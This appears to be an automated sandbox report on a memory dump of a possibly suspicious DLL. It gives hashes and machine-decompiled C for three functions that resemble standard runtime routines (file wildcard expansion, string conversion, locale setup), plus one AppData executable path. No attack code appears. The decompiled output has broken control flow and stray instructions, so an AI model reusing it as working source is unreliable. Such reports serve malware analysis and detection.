Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 60fe961260d239874f4c11af8d0f7951df22083a4fdf29bcfe196910dad5a8b5
Instruction ID: 4b36b817fb56eb26f2fa8e6a9b5daf4276f7b41942fd2b006b386b17f8666bbf
Opcode Fuzzy Hash: 60fe961260d239874f4c11af8d0f7951df22083a4fdf29bcfe196910dad5a8b5
Instruction Fuzzy Hash: 3B01F03655DF31AEAB5616F55CD95AB27D8E7437787300739E5208A2E4FF114D0142D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E548F0D, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E548F0D(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t304;
				void* _t308;
				signed int _t309;
				void* _t310;
				void* _t311;
				void* _t312;
				signed int _t313;
				void* _t314;
				void* _t315;

				_t131 = _a8;
				_t311 = _t310 - 0x28;
				_push(__esi);
				_t319 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6E53E99D(_t136, _t272, _v8, 1);
						_t312 = _t311 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6E54F739(_t234, _v28 - _t234 + _v8, _v24);
									_t312 = _t312 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6E53498C();
										asm("int3");
										_t308 = _t312;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6E544550(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6E54F739(_t302 + _t287, _t226, _v0);
												_t313 = _t312 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6E549440(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t304 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6E541B83(_t302);
														_t304 = _v12;
													}
													E6E541B83(0);
													_t210 = _t304;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6E54F739(_t302, _t226, _a4);
												_t313 = _t312 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E53498C();
													asm("int3");
													_push(_t308);
													_t309 = _t313;
													_t314 = _t313 - 0x298;
													_t166 =  *0x6e688c24; // 0x8e9367b0
													_v124 = _t166 ^ _t309;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6E5501B0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L57:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L60:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L60;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L60;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6E53D9B7(_t245 - _t289 + 1, _t289,  &_v676, E6E5483E0(_t279, __eflags));
														_t315 = _t314 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6E548E3E( &(_v608.cFileName),  &_v640,  &_v609, E6E5483E0(_t279, __eflags));
																_t315 = _t315 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L68:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t315 = _t315 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6E541B83(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L69;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L69;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L68;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L69;
																			} else {
																				goto L68;
																			}
																		}
																	}
																}
																L77:
																FindClose(_t303);
																goto L78;
																L69:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6E541B83(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6E537E90(_t227, _t289, _t280 + _t258 * 4, _t199 - _t258, 4, E6E548E26);
															}
															goto L77;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L78:
														__eflags = _v656;
														_pop(_t302);
														if(_v656 != 0) {
															E6E541B83(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L57;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t309;
													return E6E52F227(_v16 ^ _t309, _t302);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L82;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6E541B83(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6E550170(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t311 = _t311 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t311 = _t311 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L82;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6E541B83( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6E541B83(_t285);
						goto L31;
					}
				} else {
					_t220 = E6E537E6F(_t319);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6E53495F();
					L31:
					return _t299;
				}
				L82:
			}

0x6e548f12
0x6e548f15
0x6e548f18
0x6e548f19
0x6e548f1b
0x6e548f31
0x6e548f35
0x6e548f38
0x6e548f3a
0x6e548f3c
0x6e548f3e
0x6e548f40
0x6e548f43
0x6e548f46
0x6e548f49
0x6e548f4b
0x6e548fae
0x6e548fb0
0x6e548fb3
0x6e548fb5
0x6e548fb9
0x6e548fc2
0x6e548fc3
0x6e548fc6
0x6e548fc8
0x6e548fcb
0x6e548fcf
0x6e548fcf
0x6e548fd1
0x6e548fd3
0x6e548fd5
0x6e548fd7
0x6e548fd7
0x6e548fd9
0x6e548fdc
0x6e548fdf
0x6e548fdf
0x6e548fe1
0x6e548fe2
0x6e548fe2
0x6e548fed
0x6e548fef
0x6e548ff2
0x6e548ff3
0x6e548ff6
0x6e548ff6
0x6e548ffa
0x6e548ffd
0x6e549000
0x6e549000
0x6e549000
0x6e54900d
0x6e54900f
0x6e549012
0x6e549014
0x6e54902c
0x6e54902f
0x6e549032
0x6e549034
0x6e549037
0x6e549039
0x6e54903c
0x6e54903f
0x6e54909c
0x6e54909f
0x6e5490a2
0x6e5490a4
0x00000000
0x6e549041
0x6e549043
0x6e549043
0x6e549045
0x6e549048
0x6e549048
0x6e54904a
0x6e54904c
0x6e549052
0x6e549055
0x6e549055
0x6e549057
0x6e549058
0x6e549058
0x6e54905f
0x6e549062
0x6e549066
0x6e549073
0x6e549078
0x6e54907b
0x6e54907d
0x6e5490f1
0x6e5490f2
0x6e5490f3
0x6e5490f4
0x6e5490f5
0x6e5490f6
0x6e5490fb
0x6e5490ff
0x6e549101
0x6e549102
0x6e549105
0x6e549105
0x6e549108
0x6e549108
0x6e54910a
0x6e54910b
0x6e54910b
0x6e54910f
0x6e549110
0x6e549117
0x6e54911a
0x6e54911d
0x6e54911f
0x6e549127
0x6e549128
0x6e549129
0x6e54912c
0x6e549136
0x6e54913a
0x6e54913c
0x6e549150
0x6e549150
0x6e549153
0x6e54915d
0x6e549162
0x6e549165
0x6e549167
0x00000000
0x6e549169
0x6e549169
0x6e54916e
0x6e549175
0x6e549178
0x6e54917a
0x6e54918b
0x6e54918d
0x6e54918f
0x6e54918f
0x6e54918f
0x6e54917c
0x6e54917d
0x6e549182
0x6e549185
0x6e549194
0x6e54919a
0x00000000
0x6e54919d
0x6e54913e
0x6e54913e
0x6e549144
0x6e549149
0x6e54914c
0x6e54914e
0x6e5491a0
0x6e5491a2
0x6e5491a3
0x6e5491a4
0x6e5491a5
0x6e5491a6
0x6e5491a7
0x6e5491ac
0x6e5491af
0x6e5491b0
0x6e5491b2
0x6e5491b8
0x6e5491bf
0x6e5491c2
0x6e5491c5
0x6e5491c8
0x6e5491c9
0x6e5491ca
0x6e5491cd
0x6e5491d3
0x6e5491d5
0x6e5491d7
0x6e5491d7
0x6e5491d9
0x6e5491db
0x00000000
0x00000000
0x6e5491dd
0x6e5491df
0x6e5491e1
0x6e5491e3
0x6e5491ee
0x6e5491f0
0x6e5491f2
0x00000000
0x00000000
0x6e5491f2
0x6e5491e3
0x00000000
0x6e5491df
0x6e5491f4
0x6e5491f4
0x6e5491fa
0x6e5491fc
0x6e549202
0x6e549204
0x6e549226
0x6e549226
0x6e549228
0x6e54922a
0x6e549236
0x6e549236
0x6e54922c
0x6e54922c
0x6e54922e
0x00000000
0x6e549230
0x6e549230
0x6e549232
0x6e549234
0x00000000
0x00000000
0x6e549234
0x6e54922e
0x6e54923e
0x6e549246
0x6e54924c
0x6e54924d
0x6e54924f
0x6e549257
0x6e54925d
0x6e549263
0x6e549269
0x6e54927d
0x6e549282
0x6e54928d
0x6e54929d
0x6e5492a3
0x6e5492a5
0x6e5492a8
0x6e5492cb
0x6e5492cb
0x6e5492d0
0x6e5492d6
0x6e5492d6
0x6e5492dc
0x6e5492e2
0x6e5492e8
0x6e5492ee
0x6e5492f4
0x6e549315
0x6e54931a
0x6e54931f
0x6e549323
0x6e549329
0x6e54932c
0x6e54933f
0x6e54933f
0x6e549345
0x6e54934b
0x6e54934c
0x6e54934d
0x6e549352
0x6e549355
0x6e54935b
0x6e54935d
0x6e5493bb
0x6e5493c1
0x6e5493c9
0x6e5493ce
0x6e5493d4
0x6e5493d5
0x00000000
0x00000000
0x00000000
0x6e54932e
0x6e54932e
0x6e549331
0x6e549333
0x00000000
0x6e549335
0x6e549335
0x6e549338
0x00000000
0x6e54933a
0x6e54933a
0x6e54933d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54933d
0x6e549338
0x6e549333
0x6e5493d7
0x6e5493d8
0x00000000
0x6e54935f
0x6e54935f
0x6e549365
0x6e54936d
0x6e549372
0x6e549381
0x6e549381
0x6e549389
0x6e54938f
0x6e549395
0x6e54939c
0x6e54939f
0x6e5493a1
0x6e5493b1
0x6e5493b6
0x00000000
0x6e5492aa
0x6e5492aa
0x6e5492b0
0x6e5492b1
0x6e5492b2
0x6e5492b3
0x6e5492bb
0x6e5492bb
0x6e5493de
0x6e5493de
0x6e5493e5
0x6e5493e6
0x6e5493ee
0x6e5493f3
0x6e549206
0x6e549209
0x6e54920b
0x6e549220
0x00000000
0x6e54920d
0x6e54920d
0x6e549210
0x6e549211
0x6e549212
0x6e549213
0x6e549218
0x6e54920b
0x6e5493fa
0x6e549403
0x00000000
0x00000000
0x00000000
0x6e54914e
0x6e549121
0x6e549123
0x6e549124
0x6e549126
0x6e549126
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54907f
0x6e54907f
0x6e549085
0x6e549088
0x6e54908b
0x6e54908e
0x6e549091
0x6e549094
0x6e549097
0x6e549097
0x00000000
0x6e549048
0x6e549016
0x6e549016
0x6e549019
0x6e5490a6
0x6e5490a7
0x6e5490ac
0x00000000
0x6e5490ac
0x6e548f4d
0x6e548f4d
0x6e548f50
0x6e548f58
0x6e548f5b
0x6e548f62
0x6e548f64
0x6e548f66
0x6e548f81
0x6e548f82
0x6e548f83
0x6e548f84
0x6e548f89
0x6e548f8c
0x6e548f8f
0x6e548f68
0x6e548f68
0x6e548f6b
0x6e548f6c
0x6e548f6d
0x6e548f6e
0x6e548f6f
0x6e548f74
0x6e548f76
0x6e548f79
0x6e548f79
0x6e548f91
0x6e548f93
0x00000000
0x00000000
0x6e548f9c
0x6e548f9f
0x6e548fa2
0x6e548fa4
0x6e548fa6
0x00000000
0x6e548fa8
0x6e548fa8
0x6e548fab
0x00000000
0x6e548fab
0x00000000
0x6e548fa6
0x6e549021
0x6e5490ad
0x6e5490b0
0x6e5490b4
0x6e5490bd
0x6e5490c0
0x6e5490c4
0x6e5490c4
0x6e5490c6
0x6e5490c9
0x6e5490cb
0x6e5490cd
0x6e5490cf
0x6e5490d4
0x6e5490d5
0x6e5490d9
0x6e5490d9
0x6e5490dd
0x6e5490e0
0x6e5490e0
0x6e5490e4
0x00000000
0x6e5490eb
0x6e548f1d
0x6e548f1d
0x6e548f24
0x6e548f25
0x6e548f27
0x6e5490ec
0x6e5490f0
0x6e5490f0
0x00000000

APIs

_strpbrk.LIBCMT ref: 6E548F5B
_free.LIBCMT ref: 6E5490A7

Strings

*?, xrefs: 6E548F50

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 4a09de138d459f83901788852e43ed6226deb893ae770c1dd9ee959231392563
Instruction ID: 16c1f794af8f242dab47e826e317adca14df8fd156476300b004af4e7f2181d1
Opcode Fuzzy Hash: 4a09de138d459f83901788852e43ed6226deb893ae770c1dd9ee959231392563
Instruction Fuzzy Hash: E2612D76D0021ADFDB15CFA8C9815EDFBF5EF48314B148569E914E7304E7719E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E5494D2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E5494D2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6E54809B(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E54809B(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E537E39(GetLastError());
									_t17 =  *((intOrPtr*)(E6E537E6F(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E53D9EE(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E537E39(GetLastError());
						_t17 =  *((intOrPtr*)(E6E537E6F(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E53D9EE(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E53DA73(_a8);
				return 0;
			}

0x6e5494d8
0x6e5494dd
0x6e5494f1
0x6e5494f4
0x6e549526
0x6e54952e
0x6e549530
0x6e549549
0x6e54954c
0x6e54954f
0x6e54955d
0x6e54956c
0x6e549574
0x6e549576
0x6e54958f
0x6e549592
0x6e549592
0x6e549578
0x6e54957f
0x6e54958a
0x6e54958a
0x6e549594
0x6e549595
0x00000000
0x6e549595
0x6e549554
0x6e549559
0x6e54955b
0x00000000
0x00000000
0x00000000
0x6e54955b
0x6e549539
0x6e549544
0x00000000
0x6e549544
0x6e5494f6
0x6e5494f9
0x6e5494fc
0x6e54950f
0x6e549512
0x6e549514
0x6e549516
0x00000000
0x6e549516
0x6e549502
0x6e549507
0x6e549509
0x00000000
0x00000000
0x00000000
0x6e549509
0x6e5494e2
0x00000000

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe, xrefs: 6E5494D7

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
API String ID: 0-86326114
Opcode ID: 3aa8bd08f0502ad2d0760eb54326355c7204f31c2edc8aa945d0656d2c1f5b0d
Instruction ID: 6b28b87f8caa16da424e8c3d4abacec34703d9eaab51c2a931fba252a3311ddf
Opcode Fuzzy Hash: 3aa8bd08f0502ad2d0760eb54326355c7204f31c2edc8aa945d0656d2c1f5b0d
Instruction Fuzzy Hash: E72180B1614227EFA7109EF58D829DB77EDEE453687208915FA28D7144E731ED108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E52D816, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E52D816(void* __ebx, void* __eflags) {
				void* _t29;
				void* _t42;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t54;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr* _t59;
				intOrPtr* _t60;
				void* _t63;

				_t42 = __ebx;
				_push(8);
				E6E52FF75();
				E6E52E4AA(_t63 - 0x14, 0);
				_t59 =  *0x6e68ab3c; // 0x0
				 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
				 *((intOrPtr*)(_t63 - 0x10)) = _t59;
				_t56 = E6E4F87B0( *((intOrPtr*)(_t63 + 8)), E6E4F8420());
				if(_t56 != 0) {
					L5:
					E6E52E502(_t63 - 0x14);
					E6E52FF4F();
					return _t56;
				} else {
					if(_t59 == 0) {
						_push( *((intOrPtr*)(_t63 + 8)));
						_push(_t63 - 0x10);
						_t29 = E6E52DA95(_t54, _t59);
						_pop(_t48);
						__eflags = _t29 - 0xffffffff;
						if(__eflags == 0) {
							E6E4F88B0(_t42, _t56, _t59, _t63);
							asm("int3");
							_push(_t59);
							_t60 =  *0x6e68af68; // 0x0
							_t55 = 0x6e68aa88;
							 *0x6e68af6c = 0x6e68aa88;
							_push(_t56);
							_t57 = _t48;
							__eflags = _t60;
							if(_t60 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 4)) + _t60 + 0x3c)) = 0x6e68aa88;
								_t55 =  *0x6e68af6c; // 0x6e68aa88
							}
							_t49 =  *0x6e68af70; // 0x6e68ab48
							__eflags = _t49;
							if(_t49 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t49 + 4)) + _t49 + 0x3c)) = _t55;
								_t55 =  *0x6e68af6c; // 0x6e68aa88
							}
							_t50 =  *0x6e68af74; // 0x0
							__eflags = _t50;
							if(_t50 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0x3c)) = _t55;
							}
							return _t57;
						} else {
							_t56 =  *((intOrPtr*)(_t63 - 0x10));
							 *((intOrPtr*)(_t63 - 0x10)) = _t56;
							 *(_t63 - 4) = 1;
							E6E52E680(__eflags, _t56);
							 *0x6e61623c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t56 + 4))))();
							 *0x6e68ab3c = _t56;
							goto L5;
						}
					} else {
						_t56 = _t59;
						goto L5;
					}
				}
			}

0x6e52d816
0x6e52d816
0x6e52d81d
0x6e52d827
0x6e52d82c
0x6e52d837
0x6e52d83b
0x6e52d84c
0x6e52d850
0x6e52d895
0x6e52d898
0x6e52d89f
0x6e52d8a4
0x6e52d852
0x6e52d854
0x6e52d85a
0x6e52d860
0x6e52d861
0x6e52d867
0x6e52d868
0x6e52d86b
0x6e52d8a5
0x6e52d8aa
0x6e52d8ab
0x6e52d8ac
0x6e52d8b2
0x6e52d8b7
0x6e52d8bd
0x6e52d8be
0x6e52d8c0
0x6e52d8c2
0x6e52d8c9
0x6e52d8cd
0x6e52d8cd
0x6e52d8d3
0x6e52d8d9
0x6e52d8db
0x6e52d8e2
0x6e52d8e6
0x6e52d8e6
0x6e52d8ec
0x6e52d8f2
